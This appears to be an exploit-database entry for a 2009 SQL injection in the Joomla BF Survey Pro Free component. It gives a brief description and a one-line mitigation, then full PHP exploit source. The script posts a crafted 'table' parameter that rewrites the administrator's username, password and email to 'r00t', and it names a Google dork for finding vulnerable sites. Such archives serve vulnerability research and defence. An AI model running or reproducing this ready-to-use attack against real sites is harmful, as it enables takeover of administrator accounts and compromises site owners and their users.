Joomla Component BF Survey Pro Free SQL Injection Exploit

vendor:

Joomla Component BF Survey Pro Free

by:

jdc

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Component BF Survey Pro Free

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component BF Survey Pro Free SQL Injection Exploit

This exploit allows an attacker to inject malicious SQL code into the vulnerable Joomla Component BF Survey Pro Free. The malicious code is injected into the 'table' parameter of the 'updateOnePage' task of the 'com_bfsurvey_profree' component. This allows the attacker to modify the username, password, and email of the administrator account, allowing them to gain access to the administrator panel.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

<?php
 echo '<h2>Joomla Component BF Survey Pro Free SQL Injection Exploit</h2>';
 echo '<h4>jdc 2009</h4>';
 echo '<p>Google dork: inurl:com_bfsurvey_profree</p>';
   ini_set( "memory_limit", "128M" );
   ini_set( "max_execution_time", 0 );
   set_time_limit( 0 );
   if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
   $vulnerableFile = "http://".$_GET['url']."/index.php";
   $url = $vulnerableFile;
 $data = array();
 $data['option'] = 'com_bfsurvey_profree';
 $data['task'] = 'updateOnePage';
 $data['table'] = "jos_users set username=CHAR(".sqlChar( 'r00t' )."), password=CHAR(".sqlChar( md5('r00t' ) )."), email=CHAR(".sqlChar( 'x' ).") where gid=25 limit 1   --   '";
 $output = getData();
 die( '<script>alert("Now log in as r00t/r00t!");location.href="http://'.$_GET['url'].'/administrator/index.php";</script>' );
 function shutUp( $buffer ) { return false; }
 function sqlChar( $str ) { return implode( ',', array_map( 'ord', str_split( $str ) ) ); }
 function getData()
 {
   global $data, $url;
   ob_start( "shutUp" );
   $ch = curl_init();
   curl_setopt( $ch, CURL_TIMEOUT, 120 );
   curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
   curl_setopt( $ch, CURLOPT_URL, $url );
   if( count( $data ) > 0 )
   {
           curl_setopt( $ch, CURLOPT_POST, count( $data ) );
           curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
   }
   curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
   curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
   $result = curl_exec( $ch );
   curl_close( $ch );
   $return = ob_get_contents();
   ob_end_clean();
   return $return;
 }
?>

# milw0rm.com [2009-09-09]